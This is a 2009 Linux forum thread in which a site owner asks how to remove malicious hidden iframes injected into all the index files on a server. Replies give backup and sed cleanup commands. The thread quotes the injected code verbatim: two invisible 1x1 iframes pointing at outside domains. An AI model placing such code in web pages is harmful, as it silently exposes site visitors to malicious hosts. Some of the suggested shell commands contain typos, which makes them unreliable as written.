LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 08-20-2009, 12:56 AM   #1
asassin85
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Iframe issues


hello everyone

i am suffing form ifame on my linux box and i wonder if there any find and replace command or bash script to replace the whole following code

Code:
<iframe src="http://nakulpi.net/?click=81B93A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://untlexy.net/?click=18361E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
to none

thanks
 
Old 08-20-2009, 01:00 AM   #2
GrapefruiTgirl
LQ Guru
 
Registered: Dec 2006
Location: underground
Distribution: Slackware64
Posts: 7,594

Rep: Reputation: 551Reputation: 551Reputation: 551Reputation: 551Reputation: 551Reputation: 551
Is this an HTML file you want to edit, or do you want to block an IFrame so it doesn't appear in your browser?

Please advise, and if it's the latter, a browser issue, what browser are you using? If it's Firefox or Opera, try AdBlockPlus.
If it's a file you wish to edit, sed should be able to handle it.

Sasha
 
Old 08-20-2009, 01:56 AM   #3
sonnik
Member
 
Registered: May 2001
Posts: 149

Rep: Reputation: 17
Are you text browsing? You may want to look at elinks... it deals with IFRAMES a bit better than lynx if that's the situation.
 
Old 08-20-2009, 05:04 AM   #4
asassin85
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Original Poster
Rep: Reputation: 0
hello

thanks all for help , this is a malicious or virus hits all the indexes files on server sites

i want to know if there a bash script find and replace it with null or none or remove it from the indexes , because the indexes got infected with this code

for example

i have a command that can find and replace words only , but this code have a symbols like
Code:
:// - ;
the command is

Code:
find . -type f | xargs perl -pi~ -e 's/oldtext/newtext/g;'
 
Old 08-20-2009, 06:24 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530Reputation: 3530
You'll want to make a backup before starting. Either archive files in a tarball
Code:
tar -vcf /tmp/backup_`date +%Y%m%d`.tar `find /path/to/dir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc`
or copy the files to a backup path
Code:
find /path/to/wwwdir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc | cpio -pdlma /path/to/backupdir
then if you made your backup you can strip tags in place using sed and read back the "/tmp/sed.log" to see what changed (top of my head):
Code:
find /path/to/wwwdir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc | while read FILE; do
 sed -i "s|<iframe.src"=.*"></iframe>||g" "${FILE}" 2>&1 && echo "Stripped "${FILE}""
done | tee /tmp/sed.log
or if you copied files to a backup path you could 'diff' then on the fly to check what changed:
Code:
find /path/to/wwwdir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc | while read FILE; do
 sed -i "s|<iframe.src"=.*"></iframe>||g" "${FILE}" 2>&1 && echo "Stripped "${FILE}""
 diff urN /path/to/backupdir/"${FILE}" "${FILE}" 2>&1
done | tee /tmp/sed.log
and also find those changes listed in the "/tmp/sed.log". As always YMMV(VM).

Also note this only addresses the symptoms and not the cause of the infection, as in an infected mcrsft editing host or running vulnerable PHP-based software or host compromise. Leaving it at changing files will seem carefree and easy but you'll find the "infection" will also spread again and as easy.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
iframe attack on my host Bono Linux - Security 7 08-11-2009 02:46 AM
Squid+iFrame Virus ajayan Linux - Newbie 1 08-03-2009 04:08 AM
A virus changed all my index files with iframe, how to remove that iframe line? Farman Linux - Security 10 07-16-2009 09:40 AM
force iframe content to remain in iframe? frieza Programming 1 09-17-2008 07:29 AM
iframe woes ScottReed Programming 0 07-26-2007 12:04 PM


All times are GMT -5. The time now is 05:46 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration